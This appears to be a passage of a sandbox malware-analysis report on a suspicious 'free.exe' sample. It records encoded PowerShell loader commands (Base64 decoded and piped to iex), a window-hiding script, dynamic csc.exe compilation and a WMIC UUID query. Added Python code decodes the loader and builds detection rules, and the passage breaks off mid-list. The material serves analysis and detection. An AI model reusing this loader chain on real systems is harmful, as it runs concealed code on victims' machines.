      Source: dGhlYXB0Z3JvdXA=-free.exe Static PE information: section name: _RDATA
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exe Code function: 0_3_00000199000C7E8E push edx; ret 0_3_00000199000C8305
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exe Code function: 0_3_00000199000C4556 push edx; ret 0_3_00000199000C49F2
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exe Code function: 0_3_00000199000C626F push edx; ret 0_3_00000199000C6298
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (79 identical entries in the report)
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX (13 identical entries in the report)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (45 identical entries in the report)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX (3 identical entries collapsed)
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477 (6 identical entries collapsed)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5427
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4374
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6291
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2485
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 320Thread sleep count: 5427 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1848Thread sleep count: 4374 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2300Thread sleep time: -8301034833169293s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6364Thread sleep count: 6291 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5796Thread sleep count: 2485 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5788Thread sleep time: -9223372036854770s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2796Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000002.2360315901.00000163915A0000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2342171678.00000163915A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllk
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeProcess information queried: ProcessInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug (2 identical entries collapsed)
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeMemory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion

      Source: Yara matchFile source: amsi64_5652.amsi.csv, type: OTHER
      Source: Yara matchFile source: amsi64_764.amsi.csv, type: OTHER
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeProcess created: Base64 decoded [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(('{"Script":"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"}' | ConvertFrom-Json).Script)) | iex (3 identical entries collapsed)
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeProcess created: Base64 decoded [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(('{"Script":"aWYgKC1ub3QgKFtTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlBTVHlwZU5hbWVdJ1dpbjMyJykuVHlwZSkgew0KICAgIEFkZC1UeXBlIEAiDQogICAgdXNpbmcgU3lzdGVtOw0KICAgIHVzaW5nIFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlczsNCg0KICAgIHB1YmxpYyBjbGFzcyBXaW4zMiB7DQogICAgICAgIFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiKV0NCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIEdldEZvcmVncm91bmRXaW5kb3coKTsNCg0KICAgICAgICBbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIildDQogICAgICAgIFtyZXR1cm46IE1hcnNoYWxBcyhVbm1hbmFnZWRUeXBlLkJvb2wpXQ0KICAgICAgICBwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIFNob3dXaW5kb3coSW50UHRyIGhXbmQsIGludCBuQ21kU2hvdyk7DQogICAgfQ0KIkANCn0NCmZ1bmN0aW9uIEdldEFjdGl2ZVdpbmRvd1RpdGxlKCkgew0KICAgICRoV25kID0gW1dpbjMyXTo6R2V0Rm9yZWdyb3VuZFdpbmRvdygpDQogICAgJHNiID0gTmV3LU9iamVjdCBTeXN0ZW0uVGV4dC5TdHJpbmdCdWlsZGVyKDI1NikNCiAgICBbV2luMzJdOjpHZXRXaW5kb3dUZXh0KCRoV25kLCAkc2IsICRzYi5DYXBhY2l0eSkgfCBPdXQtTnVsbA0KICAgIHJldHVybiAkc2IuVG9TdHJpbmcoKQ0KfQ0KZnVuY3Rpb24gSGlkZUFjdGl2ZVdpbmRvdygpIHsNCiAgICAkaFduZCA9IFtXaW4zMl06OkdldEZvcmVncm91bmRXaW5kb3coKQ0KICAgIFtXaW4zMl06OlNob3dXaW5kb3coJGhXbmQsIDApDQp9DQokY3VycmVudFdpbmRvd1RpdGxlID0gR2V0QWN0aXZlV2luZG93VGl0bGUNCkhpZGVBY3RpdmVXaW5kb3cNCg=="}' | ConvertFrom-Json).Script)) | iex
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded 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 (2 identical entries collapsed)
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" csproduct get uuid /value
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.cmdline"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD9CB.tmp" "c:\Users\user\AppData\Local\Temp\at4aznwk\CSC4E83F948CA91455DAC7F3163ADDBB8D.TMP"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.cmdline"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE63E.tmp" "c:\Users\user\AppData\Local\Temp\f2b3v2t5\CSCCC5958D27FB74F62AE119AE083742021.TMP"
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encoded wwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0afmadabyagkabgbnacgawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacgajwb7aciauwbjahiaaqbwahqaiga6aciayqbxafkazwblaemamqb1agiamwbragcaswbgahqavablafgatgawafoavwawahuavabxaeyadqbzafcazabsagiavwbwahuazabdaduaqgbkafgaugb2agiavwbgadaayqbxadkadqbmagwaqgbuafyasabsahcawgbvaduaaabiafcavgbkaeoamqbkahaaygbqae0aeqbkahkaawb1afyasabsahcawgbtagsazwblahcamablaekaqwbbagcasqbfaeyaawbaaemamqbvaguawabcagwasqbfaeeaaqbeafeabwbnaekaqwbbagcazabyae4acabiag0aywbnafuamwbsahoazabhafyadabpahcamablaekaqwbbagcasqbiafyaegbhafcanqbuaekargboaduaywazafiababiafmanqbtagqavwa1adaayqbxadeababmagsabab1agqarwbwahkaygazaeiavabaafgasgayageavwboagwaywb6ahmatgbdagcamablaekaqwbbagcasqbiaeiamqbzag0aeabwafkaeqbcagoaygbhaeyaegbjahkaqgbyageavwa0ahoatqbpaeianwbeafeabwbnaekaqwbbagcasqbdaeeazwbjaeyadabfagiarwb4aeoaygbyaeiadgbjag4auqbvaekabgbwahoawgbyaekaegbnagkanqbragiarwb3agkaswbwadaatgbdagkaqqbnaekaqwbbagcasqbdaeeazwbjaegavgbpagiarwbsagoasqbiae4amabzafgaugbwafkaeqbcagwazqbiafiababjag0anabnafmavwa1adaavqbiafiaeqbjaeuazabsagqarqbaahyaywbtafyabgbjag0aoqaxagiabqbsafgayqbxaduaawbiadmaywbvaesavabzae4aqwbnadaaswbjaemaqqbnaekaqwbbagcasqbdaeiaygbsaecaeabzafmavwaxahcaygazaeoamablaemasgaxagmamgbwahkatqb6aekadqbaaecaeabzaekaaqbsagqarabrag8azwbjaemaqqbnaekaqwbbagcasqbgahqaeqbaafgaugaxagmabqa0adyasqbfadeaaabjag4atgbvafkavwb4aeiaywb5aggavgbiag0amqboagiabqbgag4awgbxafiavqblafgaqgbsaewaawbkahyaygayahcacabyafeamablaekaqwbbagcasqbdaeeazwbjaemaqgb3agqavwbkahmayqbxae0azwbjadmaugboagqarwbsagoasqbhafyanabkaecavgb5agiaaqbcagkaygayadkacwbjaeyatgbvagiamwbkafgayqbxaduaawbiadmaywbvafmavwa1adaavqbiafiaeqbjaecaaabyagiabqbrahmasqbhagwadqbkaemaqgb1afeamgaxagsavqayaggadgbkahkaawa3aeqauqbvagcasqbdaeeazwbmafeamablaekaawb
bae4aqwbuadaatgbdag0awgaxagiabqboadaayqbxadkadqbjaeuazabsagqarqbgagoazabhagwamgbaafyazabwagiabqbsahyazaaxafiacabkaecaeabsaesaqwbragcazqb3adaaswbjaemaqqbnaekaqwbsag8avgayaduaawbjaeqamabnafcamqbkahaaygbqae0aeqbyafqabwa2afiamgbwadaaugbtadkaeqbaafcazab5agiamwbwahuawgbgagqacabiag0augb2agqaeqbnahaarabrag8azwbjaemaqqbnaeoasaboagkasqbeadaazwbuag0avgazaewavqa5agkayqbtafyaagbkaemaqgbuaguawaboadaawgbxadaadqbwaecavga0agqaqwa1afqazabiaeoacabiag0azabdagqavwbsahmawgbhafyaeqblaeqasqaxae4aaqbrae4aqwbpaeeazwbjaemaqgbiafyamgbsahuatqb6aeoazabpagoacabiafoawabsafgayqbxaduaawbiadmazabvafoawaboadaaswbdafiabwbwadianqbraewaqwbbagsaywayaekacwbjaemaugb6afkaaqa1aeqawqbyaeiaaabzadiabaawaguauwbragcazgbdaeiauabkafgauqb0afqabgbwahmaygbbadaaswbjaemaqqbnaekasabkagwazabiafyaeqbiagkaqqbragmamgbjahuavgbhadkavabkaegasgbwagiabqbjag8aswbradaaswbmafeamablafoabgbwahuawqazafiacabiadianabnafmarwbsagsawgbvaeyaagbkaecabaayafoavgbkahaaygbtafiadgbkahkazwbwaekasabzae4aqwbpaeeazwbjaemaqqbrageargbkahuawgbdaeeaoqbjaeyadabyageavwa0ahoatqbsadaangbpagsazabsagqarqbaahyaywbtafyabgbjag0aoqaxagiabqbsafgayqbxaduaawbiadmay
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encoded 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 (3 identical entries collapsed)
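The Process created lines above record one loader chain in three layers: powershell.exe is launched with -Encoded (Base64 of the UTF-16LE command text), the decoded command pulls a second Base64 blob out of a '{"Script":"..."}' JSON wrapper with ConvertFrom-Json, and FromBase64String plus iex runs the script. The Python below is an added example written for this page, not part of the Joe Sandbox report or of the sample, that unwraps all three layers; it carries the Base64 blob copied from the report's decoded line so it can be run offline, and the JSON-wrapper regex, the helper names and the P/Invoke check are the editor's. Two caveats it makes explicit: the report's own "-encoded wwbtahk..." command line has been case-folded to lower case and therefore cannot be decoded from this page (Base64 is case-sensitive), and the recovered script calls [Win32]::GetWindowText without ever declaring it via DllImport, so GetActiveWindowTitle fails at runtime while HideActiveWindow still calls ShowWindow($hWnd, 0), SW_HIDE, on the foreground window. The Add-Type in that script is what drives the csc.exe/cvtres.exe compilations and the dropped at4aznwk.dll and f2b3v2t5.dll listed in this report.

```python
"""Unwrap the three-layer PowerShell loader encoding recorded in this report.

Added example (editor's code, not from the report or the sample).
  layer 1  powershell.exe -Encoded <Base64 of UTF-16LE command text>
  layer 2  ...FromBase64String(('{"Script":"<b64>"}' | ConvertFrom-Json).Script) | iex
  layer 3  <b64> = Base64 of the UTF-8 script
"""
import base64
import json
import re

# Copied from the report's "Base64 decoded" Process created line (the value
# inside the {"Script": ...} wrapper). Split across lines for readability only.
REPORT_SCRIPT_B64 = (
    "aWYgKC1ub3QgKFtTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlBTVHlwZU5h"
    "bWVdJ1dpbjMyJykuVHlwZSkgew0KICAgIEFkZC1UeXBlIEAiDQogICAgdXNpbmcg"
    "U3lzdGVtOw0KICAgIHVzaW5nIFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNl"
    "czsNCg0KICAgIHB1YmxpYyBjbGFzcyBXaW4zMiB7DQogICAgICAgIFtEbGxJbXBv"
    "cnQoInVzZXIzMi5kbGwiKV0NCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4g"
    "SW50UHRyIEdldEZvcmVncm91bmRXaW5kb3coKTsNCg0KICAgICAgICBbRGxsSW1w"
    "b3J0KCJ1c2VyMzIuZGxsIildDQogICAgICAgIFtyZXR1cm46IE1hcnNoYWxBcyhV"
    "bm1hbmFnZWRUeXBlLkJvb2wpXQ0KICAgICAgICBwdWJsaWMgc3RhdGljIGV4dGVy"
    "biBib29sIFNob3dXaW5kb3coSW50UHRyIGhXbmQsIGludCBuQ21kU2hvdyk7DQog"
    "ICAgfQ0KIkANCn0NCmZ1bmN0aW9uIEdldEFjdGl2ZVdpbmRvd1RpdGxlKCkgew0K"
    "ICAgICRoV25kID0gW1dpbjMyXTo6R2V0Rm9yZWdyb3VuZFdpbmRvdygpDQogICAg"
    "JHNiID0gTmV3LU9iamVjdCBTeXN0ZW0uVGV4dC5TdHJpbmdCdWlsZGVyKDI1NikN"
    "CiAgICBbV2luMzJdOjpHZXRXaW5kb3dUZXh0KCRoV25kLCAkc2IsICRzYi5DYXBh"
    "Y2l0eSkgfCBPdXQtTnVsbA0KICAgIHJldHVybiAkc2IuVG9TdHJpbmcoKQ0KfQ0K"
    "ZnVuY3Rpb24gSGlkZUFjdGl2ZVdpbmRvdygpIHsNCiAgICAkaFduZCA9IFtXaW4z"
    "Ml06OkdldEZvcmVncm91bmRXaW5kb3coKQ0KICAgIFtXaW4zMl06OlNob3dXaW5k"
    "b3coJGhXbmQsIDApDQp9DQokY3VycmVudFdpbmRvd1RpdGxlID0gR2V0QWN0aXZl"
    "V2luZG93VGl0bGUNCkhpZGVBY3RpdmVXaW5kb3cNCg=="
)

# Matches ('{"Script":"<b64>"}' | ConvertFrom-Json).Script inside layer 2.
JSON_WRAPPER_RE = re.compile(
    r"""\(\s*'(\{"Script":"[A-Za-z0-9+/=]+"\})'\s*\|\s*ConvertFrom-Json\s*\)\.Script"""
)
# DllImport declarations inside the Add-Type block, and [Win32]::X( call sites.
DECLARED_RE = re.compile(r"public\s+static\s+extern\s+\w+\s+(\w+)\s*\(")
CALLED_RE = re.compile(r"\[Win32\]::(\w+)\s*\(")


def decode_encoded_command(arg: str) -> str:
    """Layer 1: -Encoded/-EncodedCommand carries Base64 of UTF-16LE text."""
    return base64.b64decode(arg, validate=True).decode("utf-16-le")


def extract_json_script_b64(command: str) -> str:
    """Layer 2: pull the inner Base64 out of the ConvertFrom-Json wrapper."""
    m = JSON_WRAPPER_RE.search(command)
    if m is None:
        raise ValueError("no ConvertFrom-Json Script wrapper in command")
    return json.loads(m.group(1))["Script"]


def decode_inner_script(script_b64: str) -> str:
    """Layer 3: the script itself is plain Base64 of UTF-8."""
    return base64.b64decode(script_b64, validate=True).decode("utf-8")


def decode_chain(encoded_arg: str) -> str:
    """All three layers, from the -Encoded argument to the final script."""
    command = decode_encoded_command(encoded_arg)
    return decode_inner_script(extract_json_script_b64(command))


def build_encoded_command(script_b64: str) -> str:
    """Re-create the loader's layering around a script blob (to exercise decode_chain)."""
    command = (
        "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("
        "('{\"Script\":\"" + script_b64 + "\"}' | ConvertFrom-Json).Script)) | iex"
    )
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def is_case_folded(b64: str) -> bool:
    """True when every letter is lower case: the blob was case-folded (as on the
    report's 'powershell.exe -encoded wwbtahk...' line) and cannot be decoded."""
    letters = [c for c in b64 if c.isalpha()]
    return bool(letters) and all(c.islower() for c in letters)


def find_undeclared_pinvokes(script: str) -> set:
    """Names the script calls on [Win32]:: but never declares with DllImport."""
    return set(CALLED_RE.findall(script)) - set(DECLARED_RE.findall(script))


if __name__ == "__main__":
    script = decode_inner_script(REPORT_SCRIPT_B64)
    print(script)
    print("undeclared P/Invoke calls:", find_undeclared_pinvokes(script))
    assert decode_chain(build_encoded_command(REPORT_SCRIPT_B64)) == script
```

Run stand-alone it prints the recovered script and reports GetWindowText as the one call with no matching declaration; the round trip through build_encoded_command shows the same decoder handles a correctly cased -Encoded argument end to end.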
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe VolumeInformation
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeQueries volume information: C:\WindowsTasks\Platform VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (12 identical entries across the two powershell.exe processes collapsed)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (2 identical entries collapsed)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (2 identical entries collapsed)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation (2 identical entries collapsed)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation (2 identical entries collapsed)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation (2 identical entries collapsed)
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
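The process-creation lines in the HIPS / PFW section, the Sigma hits listed in the overview (Suspicious Execution of Powershell with Base64, Dot net compiler compiles file from suspicious location, Dynamic .NET Compilation Via Csc.EXE) and the WMIC csproduct UUID query together describe a chain that ordinary process telemetry can correlate without any Base64 decoding. The Python below is an added example written for this page, not part of the report or of any Sigma rule, that classifies constructed process-creation events modelled on this report's process tree and flags the parent under which the whole chain occurs. Image paths and command lines are the report's; PIDs 6004, 5652 and 764 are the report's, while the remaining PIDs, the two benign look-alike events and the field names pid, ppid, image, parent_image and command_line are the editor's assumptions, not any product's schema.

```python
"""Flag the encoded-PowerShell -> csc.exe -> WMIC UUID chain from process events.

Added example (editor's code, not from the report or from the Sigma rules it cites).
"""
import re
from collections import defaultdict

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -enc,
# -encoded ...); the prefix is checked in encoded_argument(). Requiring 40+
# Base64 characters keeps short switches such as -ExecutionPolicy out.
FLAG_RE = re.compile(r"(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{40,})(?=\s|$)", re.I)
# csc.exe reading a .cmdline response file under the user's Temp directory,
# which is what Add-Type (and this report's loader) produce.
CSC_TEMP_RE = re.compile(r'\\csc\.exe"?\s.*@"?[^"\s]*\\AppData\\Local\\Temp\\', re.I)
WMIC_UUID_RE = re.compile(r"\bcsproduct\s+get\s+uuid\b", re.I)
SCRIPT_HOSTS = ("\\powershell.exe", "\\pwsh.exe", "\\wscript.exe", "\\cscript.exe", "\\mshta.exe")


def encoded_argument(command_line):
    """Return the Base64 argument of an -EncodedCommand-style flag, or None."""
    for flag, blob in FLAG_RE.findall(command_line):
        if "encodedcommand".startswith(flag.lower()):
            return blob
    return None


def classify(event):
    """Return the names of the rules one process-creation event matches."""
    image = event["image"].lower()
    parent = event.get("parent_image", "").lower()
    cmd = event["command_line"]
    hits = []
    if image.endswith(("\\powershell.exe", "\\pwsh.exe")) and encoded_argument(cmd):
        hits.append("powershell_encoded_command")
    if image.endswith("\\csc.exe"):
        if CSC_TEMP_RE.search(cmd):
            hits.append("csc_compile_from_temp")
        if parent.endswith(SCRIPT_HOSTS):
            hits.append("csc_spawned_by_script_host")
    if image.endswith("\\wmic.exe") and WMIC_UUID_RE.search(cmd):
        hits.append("wmic_csproduct_uuid")
    return hits


def correlate(events):
    """PIDs of parents whose children show the whole chain seen in this report:
    an encoded PowerShell and a WMIC UUID query as siblings, and csc.exe
    compiling from Temp underneath that PowerShell."""
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)
    flagged = []
    for parent_pid, kids in children.items():
        ps_pids = [k["pid"] for k in kids if "powershell_encoded_command" in classify(k)]
        has_uuid = any("wmic_csproduct_uuid" in classify(k) for k in kids)
        csc_under_ps = any(
            "csc_compile_from_temp" in classify(c)
            for p in ps_pids for c in children.get(p, [])
        )
        if ps_pids and has_uuid and csc_under_ps:
            flagged.append(parent_pid)
    return flagged


# Constructed events modelled on the report's process tree (see lead-in for
# which values are the report's and which are assumed). ENC_PREFIX is the
# first 64 characters of the report's case-folded -encoded argument.
SAMPLE = r"C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CSC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
WMIC = r"C:\Windows\System32\wbem\WMIC.exe"
EXPLORER = r"C:\Windows\explorer.exe"
ENC_PREFIX = "wwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoa"

EVENTS = [
    {"pid": 6004, "ppid": 1234, "image": SAMPLE, "parent_image": EXPLORER,
     "command_line": f'"{SAMPLE}"'},
    {"pid": 5652, "ppid": 6004, "image": PS, "parent_image": SAMPLE,
     "command_line": f'"{PS}" -Encoded {ENC_PREFIX}'},
    {"pid": 764, "ppid": 6004, "image": PS.lower(), "parent_image": SAMPLE,
     "command_line": f'"{PS.lower()}" -encoded {ENC_PREFIX}'},
    {"pid": 4100, "ppid": 6004, "image": WMIC, "parent_image": SAMPLE,
     "command_line": '"wmic" csproduct get uuid /value'},
    {"pid": 4200, "ppid": 5652, "image": CSC, "parent_image": PS,
     "command_line": f'"{CSC}" /noconfig /fullpaths '
                     r'@"C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.cmdline"'},
    # Benign look-alikes (constructed): an interactive PowerShell and a build-time csc.
    {"pid": 7000, "ppid": 1234, "image": PS, "parent_image": EXPLORER,
     "command_line": f'"{PS}" -NoProfile -Command Get-Date'},
    {"pid": 7100, "ppid": 7050, "image": CSC,
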